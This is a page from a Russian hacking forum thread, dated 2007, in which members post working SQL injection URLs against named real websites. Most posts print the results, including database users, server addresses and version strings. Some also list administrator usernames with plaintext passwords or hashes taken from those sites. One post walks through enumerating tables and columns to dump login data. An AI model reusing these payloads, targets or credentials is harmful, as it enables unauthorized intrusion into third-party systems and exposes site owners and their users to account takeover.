HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 388 из 1602 « Первая < 288338378 384 385 386 387 388 389 390 391 392 3984384888881388 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.12.2007, 00:08
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию
PR:2
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11/*
igwane_be@eu1473m.lyceu.net:5.0.24alyceu-log:igwane_be_1


Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+1,1/*
count = 162...ppc

На этом мое желание работать дальше с лимитом почему-то иссякло =/
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 03.12.2007, 01:10
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
Wink
http://www.onesimpleloan.com/

Код:
http://www.onesimpleloan.com/news_display.asp?news_id=1+or+1=(SELECT+TOP+1+cast(userna   me+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+cms_users)--
Admin:lcpa!87

http://www.fnplzen.cz/

Код:
http://www.fnplzen.cz/novinky_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(admName+as+nvarchar)%2B%27%3A%27%2Bcast(admPHash+as+nvarchar)+from+tblQNAdmin)--
admin:-280742843

http://www.justrams.com/

Код:
http://www.justrams.com/contents/news/news_view.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+justrams_admin)--
adminjr:#jr$2007

http://www.intellijock.com/

Код:
http://www.intellijock.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins+where+admin_id=1)--
Последний раз редактировалось Ded MustD!e; 03.12.2007 в 02:31..
 
Ответить с цитированием

  #3  
Старый 03.12.2007, 03:31
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами: 10240623

Репутация: 79
По умолчанию
БД 5 значит смотрим 140 таблиц сами

Код HTML:
http://www.mountain.ru/news/index.php?id_class_news=-0%20union%20select%20concat(user_name,0x3a,password)+FROM+user/*
Искать в исходном тексте сайта после "<option value='/news/index.php?id_class_news="
 
Ответить с цитированием

  #4  
Старый 03.12.2007, 11:19
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию
Код:
http://www.falsecode.ru/fileinfo.php?id=77+and+ascii(lower(substring(version(),1,1)))=0x33/*
...ппц, такие динозавры еще живы?
 
Ответить с цитированием

  #5  
Старый 03.12.2007, 12:33
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами: 10054253

Репутация: 86
Unhappy
www.realmusic.ua
Код:
http://www.realmusic.ua/buy.php?id=-1+union+select+1/*
www.rebellino.it
Код:
http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
Sql47718@62.149.140.24
Sql47718_3
4.0.27-standard-log
www.3onweb.it
Код:
http://www.3onweb.it/download/guide/focuson.php?id=-1+union+select+1,2,3,4/*
тут ничего не выйдет =(
Последний раз редактировалось Mike 007; 03.12.2007 в 12:58..
 
Ответить с цитированием

  #6  
Старый 03.12.2007, 13:16
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
С нами: 10080326

Репутация: 576
По умолчанию
Fata1ex,хекед

Узнаём имя БД и таблицу
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(table_schema,char(58),table_name),5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+2,1/*
igwane_be_5.members

Узнаём столбцы
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,column_name,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=0x6D656D62657273+limit+3,1/*
login,password

Ну и хек
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11+from+igwane_be_5.members/*
admin:exuifoLgJGROk

Есть ещё таблица igwane_be_3.eck_user
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11+from+igwane_be_3.eck_user+limit+1,1/*
С помощью https://forum.antichat.ru/showpost.php?p=401199&postcount=18
Последний раз редактировалось v1ru$; 03.12.2007 в 13:20..
 
Ответить с цитированием

  #7  
Старый 03.12.2007, 14:48
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию
PR:5

Код:
http://www.lesmuseesenwallonie.be/html/musee.php?id=-254+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(58),user(),version(),database()),25/*

mew@localhost:4.1.20:mew


PR:5
Код:
http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,concat_ws(char(58),user(),version(),database()),3/*
jeugdrodekruisbe@217.19.238.181:5.0.27:jeugdrodekr uisbe


Код:
http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,count(table_name),3+from+information_schema.tables/*
count = 72 =(
Код:
tblMail
g2_User
...


PR:3
Код:
http://www.arriere-scene.be/saison_details.php?ID=-222+union+select+1,2,3,4,5,6,concat_ws(char(58),user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
arrieres@10.0.75.67:4.0.25-standard-log:arrieres
 
Ответить с цитированием

  #8  
Старый 04.12.2007, 00:48
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
http://www.spbreligion.ru/news.php?id=-1'+union+select+1,2,3,concat_ws(0x2F,cast(version( )+as+binary),cast(database()+as+binary),cast(user( )+as+binary)),5,6,7,8,9,10/*

4.1.15/spbreligion/root@localhost
-------------------------------------------------------------------------

http://www.portal-ug.ru/news/?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

4.1.20-lk-log/portugru_new/portugru_new@localhost
-------------------------------------------------------------------------

http://www.finnews.ru/cur_new.php?idnws=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.45-log/u13279/u13279@10.10.223.217
-------------------------------------------------------------------------

http://www.vi1.ru/index.php?id=1&news=-4+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,1/*

4.1.20/vb1ru/fyG6ds9@localhost
 
Ответить с цитированием

  #9  
Старый 04.12.2007, 01:15
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
Хотел купить новый доктор мартинс и наткнулся :
Код:
http://www.shoes.ru/index.php?akus=4&id=-111+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,login,pwd),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
там еще есть форум пхпбб, но не префикс не смог подобрать, удачи
 
Ответить с цитированием

  #10  
Старый 04.12.2007, 14:37
reversys
Участник форума
Регистрация: 22.11.2007
Сообщений: 159
С нами: 9721086

Репутация: 156
По умолчанию
Код:
http://www.e28.dk/Forum/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1/*
 
Ответить с цитированием
Ответ
Страница 388 из 1602 « Первая < 288338378 384 385 386 387 388 389 390 391 392 3984384888881388 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.